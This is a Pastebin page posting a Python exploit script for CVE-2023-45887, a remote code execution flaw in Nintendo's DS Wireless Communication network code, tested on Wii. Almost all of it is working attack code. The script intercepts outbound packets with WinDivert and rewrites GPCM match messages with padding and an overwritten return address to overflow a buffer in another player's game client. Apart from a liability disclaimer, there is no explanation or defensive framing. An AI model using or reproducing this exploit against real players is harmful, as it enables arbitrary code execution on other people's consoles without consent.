Advertisement
FlyFar

DS Wireless Communication Remote Code Execution - CVE-2023-45887

Feb 16th, 2024
944
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.91 KB | Cybersecurity | 0 0
  1. # Exploit Title: DS Wireless Communication Remote Code Execution
  2. # Date: 11 Oct 2023
  3. # Exploit Author: MikeIsAStar
  4. # Vendor Homepage: https://www.nintendo.com
  5. # Version: Unknown
  6. # Tested on: Wii
  7. # CVE: CVE-2023-45887
  8.  
  9. """This code will inject arbitrary code into a client's game.
  10.  
  11. You are fully responsible for all activity that occurs while using this code.
  12. The author of this code can not be held liable to you or to anyone else as a
  13. result of damages caused by the usage of this code.
  14. """
  15.  
  16. import re
  17. import sys
  18.  
  19. try:
  20.     import pydivert
  21. except ModuleNotFoundError:
  22.     sys.exit("The 'pydivert' module is not installed !")
  23.  
  24.  
  25. # Variables
  26. LR_SAVE = b'\x41\x41\x41\x41'
  27. assert len(LR_SAVE) == 0x04
  28. PADDING = b'MikeStar'
  29. assert len(PADDING) > 0x00
  30.  
  31. # Constants
  32. DWC_MATCH_COMMAND_INVALID = b'\xFE'
  33. PADDING_LENGTH = 0x23C
  34. FINAL_KEY = b'\\final\\'
  35. WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'
  36.  
  37.  
  38. def try_modify_payload(payload):
  39.     message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
  40.     message = re.search(message_pattern, payload)
  41.     if not message:
  42.         return None
  43.  
  44.     payload = payload[:message.end()]
  45.     payload += DWC_MATCH_COMMAND_INVALID
  46.     payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]
  47.     payload += LR_SAVE
  48.     payload += FINAL_KEY
  49.     return payload
  50.  
  51.  
  52. def main():
  53.     try:
  54.         with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
  55.             for packet in packet_buffer:
  56.                 payload = try_modify_payload(packet.payload)
  57.                 if payload is not None:
  58.                     print('Modified a GPCM message !')
  59.                     packet.payload = payload
  60.                 packet_buffer.send(packet)
  61.     except KeyboardInterrupt:
  62.         pass
  63.     except PermissionError:
  64.         sys.exit('This program must be run with administrator privileges !')
  65.  
  66.  
  67. if __name__ == '__main__':
  68.     main()
  69.        
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement